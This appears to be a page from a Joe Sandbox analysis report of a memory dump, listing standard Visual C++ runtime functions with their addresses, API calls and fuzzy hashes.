Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 645e94ffdd4343ad5342ca20de8b52caa9b9b54d5cbe6946368ff24893d5c80b
Instruction ID: 3084f46a73a9c50ef9f7a8ffd03054309264ea668cfe5ce8b6b9e4cc367bd9e5
Opcode Fuzzy Hash: 645e94ffdd4343ad5342ca20de8b52caa9b9b54d5cbe6946368ff24893d5c80b
Instruction Fuzzy Hash: B7A01130200200CFA300CFFAAE082083AACAA8A2A0302C038A200C0220EB3080038F02

Uniqueness

Uniqueness Score: -1.00%

Function 00A19996 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 882a083e5a11e777ef3bb4f402d93592e50d84e0d0a4c14526fe5343209cb6cc
Instruction ID: 25a5ea22d1659fd20c77c1a5c34b8c8394f6685373f2a37a644036a03df04b92
Opcode Fuzzy Hash: 882a083e5a11e777ef3bb4f402d93592e50d84e0d0a4c14526fe5343209cb6cc
Instruction Fuzzy Hash: 33B1E7356007069FDB38EB25CCA2AF7B3E8EF54708F14456DE983C6580EA75A9C6C750

Uniqueness

Uniqueness Score: -1.00%

Function 00A2B400 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47e57290291bf3e55fc76926b40b9455446aaecab0376499f589c11769486e1
Instruction ID: ea3e4387b39ce806ce78312b7a9645757156f0a8d6b1af2c7d6898ca67931afe
Opcode Fuzzy Hash: e47e57290291bf3e55fc76926b40b9455446aaecab0376499f589c11769486e1
Instruction Fuzzy Hash: 77F03072900A19AFD714CFADD5415DFFBF8EB48320B10856ED4AAF3260D630FA458B51

Uniqueness

Uniqueness Score: -1.00%

Function 00A400D3 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A09CB8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00A09DD7
___TypeMatch.LIBVCRUNTIME ref: 00A09EE5
_UnwindNestedFrames.LIBCMT ref: 00A0A037
CallUnexpected.LIBVCRUNTIME ref: 00A0A052

Strings

csm, xrefs: 00A09E0E
csm, xrefs: 00A09CF5
csm, xrefs: 00A09D62

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 36e47c1370719f9bd5a09bbec8d26e333aeca97840d1c3bdaac23dab6ecdc348
Instruction ID: dcf55df2e0b06c0ba72eafd56c25aba1cb6fb603092c3d3f45bf8aa62b4f5279
Opcode Fuzzy Hash: 36e47c1370719f9bd5a09bbec8d26e333aeca97840d1c3bdaac23dab6ecdc348
Instruction Fuzzy Hash: C9B1487180020EEFCF25DFA4E9819AFBBB5BF14310F14855AE815AB293D731DA51CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A1551C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00A15795

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 5579ab0abf0469931f2714f6546004045c965fdc938b64e972be5070cf4d3cf0
Instruction ID: 8db7a11d1cfeef2503637bddb7d8b7cccb9430c93a6cdf4e40d12e9f45fde423
Opcode Fuzzy Hash: 5579ab0abf0469931f2714f6546004045c965fdc938b64e972be5070cf4d3cf0
Instruction Fuzzy Hash: 86B1E270E00649DFDB11DFA9D981BFD7BB6AF8A310F144158E451AB292C7709DC2CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1C993 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(01100520,01100520,?,7FFFFFFF,?,00A1CC63,01100520,01100520,?,01100520,?,?,?,?,01100520,?), ref: 00A1CA39
__alloca_probe_16.LIBCMT ref: 00A1CAF4
__alloca_probe_16.LIBCMT ref: 00A1CB83
__freea.LIBCMT ref: 00A1CBCE
__freea.LIBCMT ref: 00A1CBD4
__freea.LIBCMT ref: 00A1CC0A
__freea.LIBCMT ref: 00A1CC10
__freea.LIBCMT ref: 00A1CC20

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 4443ca47ad5c254d0ff8882893cdb801f988195f333c8f1aa306781f8dae7f19
Instruction ID: b28e4f1d1ab031dcb7321f24a0b91f4b602177cab47d148ca995fef8d57ce1eb
Opcode Fuzzy Hash: 4443ca47ad5c254d0ff8882893cdb801f988195f333c8f1aa306781f8dae7f19
Instruction Fuzzy Hash: 8E71F572984209ABDF219FA4CD82FFE77BA9F49374F280055E945E7281E6359CC0C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A06380 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00A063C9
__alloca_probe_16.LIBCMT ref: 00A063F5
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00A06434
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A06451
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00A06490
__alloca_probe_16.LIBCMT ref: 00A064AD
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A064EF
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A06512

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: cd2264dfe67d0087d937ae164164c0d6874cc0cb49c38563b7201a03725c7f1c
Instruction ID: 2c614fe23f7f0f41710859134b595c9f05bfb1d2f26e6017b55eb98a73f45ebc
Opcode Fuzzy Hash: cd2264dfe67d0087d937ae164164c0d6874cc0cb49c38563b7201a03725c7f1c
Instruction Fuzzy Hash: A251BD7291021EAFEB209FA0ED45FAB7BB9EB44748F158024F905DA1D4E731ED21CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A09750 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A09787
___except_validate_context_record.LIBVCRUNTIME ref: 00A0978F
_ValidateLocalCookies.LIBCMT ref: 00A09818
__IsNonwritableInCurrentImage.LIBCMT ref: 00A09843
_ValidateLocalCookies.LIBCMT ref: 00A09898

Strings

csm, xrefs: 00A0982D

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e8f278fab912d510cf6e736af0471285877178494f9d00ac9fbf03372684df35
Instruction ID: a27ce66fd06ded348459336391495235b74d68c9c5566378d3bb852c41bba8d0
Opcode Fuzzy Hash: e8f278fab912d510cf6e736af0471285877178494f9d00ac9fbf03372684df35
Instruction Fuzzy Hash: DF41AF35A0021DABCF10DF68E884A9FBBB5AF45324F14C165E814AB3D3D7319A55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A03966 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A0396D
std::_Lockit::_Lockit.LIBCPMT ref: 00A03977
int.LIBCPMT ref: 00A0398E

Part of subcall function 00A016AA: std::_Lockit::_Lockit.LIBCPMT ref: 00A016BB
Part of subcall function 00A016AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00A016D5

codecvt.LIBCPMT ref: 00A039B1
std::_Facet_Register.LIBCPMT ref: 00A039C8
std::_Lockit::~_Lockit.LIBCPMT ref: 00A039E8
Concurrency::cancel_current_task.LIBCPMT ref: 00A039F5

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 0d81e1a943abdf493f389090e3e6d5f8e0dd7ec2274193fbbf171cf8266d4313
Instruction ID: 7a8b7745d33b1ca0bcf4192627fc3f221ec74c09d807b30562b803928463db11
Opcode Fuzzy Hash: 0d81e1a943abdf493f389090e3e6d5f8e0dd7ec2274193fbbf171cf8266d4313
Instruction Fuzzy Hash: E11106729002189FCF10EF68E9166AD77B8EF95724F144119E801E72C0DFB19E45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A04D35 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A04D3C
std::_Lockit::_Lockit.LIBCPMT ref: 00A04D46
int.LIBCPMT ref: 00A04D5D

Part of subcall function 00A016AA: std::_Lockit::_Lockit.LIBCPMT ref: 00A016BB
Part of subcall function 00A016AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00A016D5

codecvt.LIBCPMT ref: 00A04D80
std::_Facet_Register.LIBCPMT ref: 00A04D97
std::_Lockit::~_Lockit.LIBCPMT ref: 00A04DB7
Concurrency::cancel_current_task.LIBCPMT ref: 00A04DC4

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: e4d9b230f63cc83b058b235cea601d89c394d5f7fb1cce04777164f7c0b42d30
Instruction ID: 2894cf5262119efe3496f5fd0c6a9fc3328cf354702378b9baef4af9765a6443
Opcode Fuzzy Hash: e4d9b230f63cc83b058b235cea601d89c394d5f7fb1cce04777164f7c0b42d30
Instruction Fuzzy Hash: 5E11E172900219DFCB01EBA8EA016EEBBF4AF44710F24451AE911EB2D1DB71AA01CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A0994A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A09941,00A0959A,00A07002), ref: 00A09958
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A09966
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A0997F
SetLastError.KERNEL32(00000000,00A09941,00A0959A,00A07002), ref: 00A099D1

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 496cfa00f31d35b41ca5a69faaa6bbd8e49bf848f2f8ab8470c0589830000191
Instruction ID: 3c11d1ac055c142cb53b4910f7f011040087f03a0fa667f7c09451d0d03a3935
Opcode Fuzzy Hash: 496cfa00f31d35b41ca5a69faaa6bbd8e49bf848f2f8ab8470c0589830000191
Instruction Fuzzy Hash: 6701D43220D71D5EE62467F87D95A6B3BA6EB12BB1B20033EF424451F6EE618C02D242

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F2DE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,126C9991,?,?,00000000,00A1E2B4,000000FF,?,00A0F26E,00A0F39E,?,00A0F242,00000000), ref: 00A0F313
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A0F325
FreeLibrary.KERNEL32(00000000,?,?,00000000,00A1E2B4,000000FF,?,00A0F26E,00A0F39E,?,00A0F242,00000000), ref: 00A0F347

Strings

mscoree.dll, xrefs: 00A0F30C
CorExitProcess, xrefs: 00A0F31D

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 383caf5cf2608ecdb5d3c407af6cf6efa5bf21fea34e9d706e58a7324f9608f8
Instruction ID: 9d2325e6e74c07181066233b9f7192de70487e4ba8c9ccd91822e2b1b75d54fb
Opcode Fuzzy Hash: 383caf5cf2608ecdb5d3c407af6cf6efa5bf21fea34e9d706e58a7324f9608f8
Instruction Fuzzy Hash: 0C016735504659FFDB11CB94DC05FEE77B9FB04B24F044535F825A26D0E7749901CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00A02334 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A02340
int.LIBCPMT ref: 00A02353

Part of subcall function 00A016AA: std::_Lockit::_Lockit.LIBCPMT ref: 00A016BB
Part of subcall function 00A016AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00A016D5

std::_Facet_Register.LIBCPMT ref: 00A02386
std::_Lockit::~_Lockit.LIBCPMT ref: 00A0239C
Concurrency::cancel_current_task.LIBCPMT ref: 00A023A7

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 11d8a14f1885262e99074f2455c5c7e91d854f4ba69586562f1473c2beab881b
Instruction ID: 84e29c4d2fbd07eb6b55a99a06ff03ab9c1ab5e8c3d162d023317a017ce917b8
Opcode Fuzzy Hash: 11d8a14f1885262e99074f2455c5c7e91d854f4ba69586562f1473c2beab881b
Instruction Fuzzy Hash: BC01F77290021CABCB15AB94FD099ED7768DF80760F100158F4159F2D0EB359E42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A02F03 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A02F0F
int.LIBCPMT ref: 00A02F22

Part of subcall function 00A016AA: std::_Lockit::_Lockit.LIBCPMT ref: 00A016BB
Part of subcall function 00A016AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00A016D5

std::_Facet_Register.LIBCPMT ref: 00A02F55
std::_Lockit::~_Lockit.LIBCPMT ref: 00A02F6B
Concurrency::cancel_current_task.LIBCPMT ref: 00A02F76

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6c624bbdb42be781510a336c91b5d1a95c6e38589aef30d29a22a5e141d51ac5
Instruction ID: 7e7cf66b71b4c2beb34f7dc5fb272568e0344e51692754059a8296c794802f5c
Opcode Fuzzy Hash: 6c624bbdb42be781510a336c91b5d1a95c6e38589aef30d29a22a5e141d51ac5
Instruction Fuzzy Hash: 9701A73290021DABCB15EB98F9099ED7778DF907A0B104159F505AB2D0EA319E46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A036E9 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A036F0
std::_Lockit::_Lockit.LIBCPMT ref: 00A036FB
std::locale::_Setgloballocale.LIBCPMT ref: 00A03716
_Yarn.LIBCPMT ref: 00A0372C
std::_Lockit::~_Lockit.LIBCPMT ref: 00A03769

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
String ID:
API String ID: 156189095-0
Opcode ID: 40df690f627a5e4d04b178ef56edb9839492242c9e2adb56a10f6e10c5b18368
Instruction ID: 7d6d0a45a76b00cebcbc6b22b0604161afdea4c46e7bd73c6bfea5193a5e0194
Opcode Fuzzy Hash: 40df690f627a5e4d04b178ef56edb9839492242c9e2adb56a10f6e10c5b18368
Instruction Fuzzy Hash: 6D017CB6A00118ABCB06EF65EA455BC7BB9FF85B50F148059E801973C1CF34AB47CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00A43031 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00A4303D

Part of subcall function 00A43214: __getptd_noexit.LIBCMT ref: 00A43217
Part of subcall function 00A43214: __amsg_exit.LIBCMT ref: 00A43224

__getptd.LIBCMT ref: 00A43054
__amsg_exit.LIBCMT ref: 00A43062
__lock.LIBCMT ref: 00A43072
__updatetlocinfoEx_nolock.LIBCMT ref: 00A43086

Memory Dump Source

Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ab500465c7949d66768cd5fa76516c7e20d4d04377781581de3136c8911f917d
Instruction ID: 54e9344bce079b1d5f8ae02b99161dc54f052bc99cd1f80bbf1bc0d6215c0597
Opcode Fuzzy Hash: ab500465c7949d66768cd5fa76516c7e20d4d04377781581de3136c8911f917d
Instruction Fuzzy Hash: 95F06D3BA406109BDF61FBA85A06B5976A0AFC0721F604359F514672C2CB685A40CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00A0AA92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00A0AA43,00000000,00000001,00A2A744,?,?,?,00A0ABE6,00000004,InitializeCriticalSectionEx,00A20C90,InitializeCriticalSectionEx), ref: 00A0AA9F
